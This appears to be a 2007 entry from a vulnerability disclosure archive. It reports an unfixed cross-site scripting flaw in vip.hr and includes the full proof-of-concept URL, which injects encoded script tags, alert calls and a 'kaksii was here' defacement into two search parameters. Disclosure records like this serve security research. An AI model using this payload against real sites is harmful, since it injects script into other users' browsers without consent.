Security researcher kaksii, has submitted on 02/11/2007 a cross-site-scripting (XSS) vulnerability affecting vip.hr, which at the time of submission ranked 4336 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 05/11/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
| Date submitted: 02/11/2007 |
Date published: 05/11/2007 |
Fixed? Mail us! | Status:  UNFIXED |
| Author: kaksii |
Domain: vip.hr |
Category: XSS |
Pagerank: 4336 |
|---|
URL: http://vip.hr/sp/show?lr=&hl=&oe=&ie=&q=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%3C%2Ftextarea%
3E%3Cscript%3Ealert%28%22kaksii_was_here%22%29%3Cscript%3Ealert%28%27kaksii_was_here%27%29%3Balert%2
81%29%3C%2Fscript%3E%22%3C%2Fhtml%3E%3Chtml%3E%3Cscript%3Ealert%2810111%29%3C%2Fscript%3E%3Cdiv%2520
align%3Dcenter%3E%2520%3Cfont%2520size%3D4%3E%3Ctextarea%2520name%3D1%2520cols%3D100000%2520rows%3D1
0000%2520id%3D1%3Ekaksii%2520was%2520here%3C%2Ftextarea%3E%3C%2Ffont%3E%3C%2Fdiv%3E%3Cnoscript%3E%3C
plaintext%3E&cof=&idc=25001579&srchstr=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%3C%2Ftextarea%3
E%3Cscript%3Ealert%28%22kaksii_was_here%22%29%3Cscript%3Ealert%28%27kaksii_was_here%27%29%3Balert%28
1%29%3C%2Fscript%3E%22%3C%2Fhtml%3E%3Chtml%3E%3Cscript%3Ealert%2810111%29%3C%2Fscript%3E%3Cdiv%2520a
lign%3Dcenter%3E%2520%3Cfont%2520size%3D4%3E%3Ctextarea%2520name%3D1%2520cols%3D100000%2520rows%3D10
000%2520id%3D1%3Ekaksii%2520was%2520here%3C%2Ftextarea%3E%3C%2Ffont%3E%3C%2Fdiv%3E%3Cnoscript%3E%3Cp
laintext%3E&podrucje=music&Submit=TRA%AEI |
|
Click here to view the mirror
|
|
|
| 
